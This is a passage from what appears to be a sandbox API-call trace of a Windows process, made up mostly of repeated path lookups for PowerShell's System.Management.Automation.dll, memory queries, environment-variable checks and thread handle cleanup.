	[0227.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.822] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.823] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.824] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.825] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.826] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.830] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0227.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.857] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.860] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0234.869] VirtualQuery (in: lpAddress=0xbb880, lpBuffer=0xbc740, dwLength=0x30 | out: lpBuffer=0xbc740*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0234.871] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0234.872] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.068] VirtualQuery (in: lpAddress=0xbb880, lpBuffer=0xbc740, dwLength=0x30 | out: lpBuffer=0xbc740*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0236.089] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0236.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.092] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0236.092] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0236.097] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0236.097] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0237.272] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0237.272] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0237.282] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0237.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0237.285] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0237.285] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0238.535] VirtualQuery (in: lpAddress=0xbb880, lpBuffer=0xbc740, dwLength=0x30 | out: lpBuffer=0xbc740*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0238.537] VirtualQuery (in: lpAddress=0xbb880, lpBuffer=0xbc740, dwLength=0x30 | out: lpBuffer=0xbc740*(BaseAddress=0xbb000, AllocationBase=0x40000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.388] CoTaskMemAlloc (cb=0x104) returned 0x2e4100
	[0250.388] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4100, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0252.304] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2e4540
	[0252.306] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x2e4650
	[0258.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.511] CoTaskMemAlloc (cb=0x104) returned 0x2e4760
	[0259.511] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2e4760, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc4e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.518] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.520] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xbc430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 125
	os_tid = 0x8b0


Thread:
	id = 126
	os_tid = 0x90c


Thread:
	id = 127
	os_tid = 0x740


Thread:
	id = 128
	os_tid = 0x440


Thread:
	id = 129
	os_tid = 0x74c

	[0061.559] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.892] LocalFree (hMem=0x2f3910) returned 0x0
	[0149.892] CloseHandle (hObject=0x1d0) returned 1
	[0149.892] CloseHandle (hObject=0x13) returned 1
	[0149.893] CloseHandle (hObject=0xf) returned 1
	[0149.893] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.893] RegCloseKey (hKey=0x308) returned 0x0
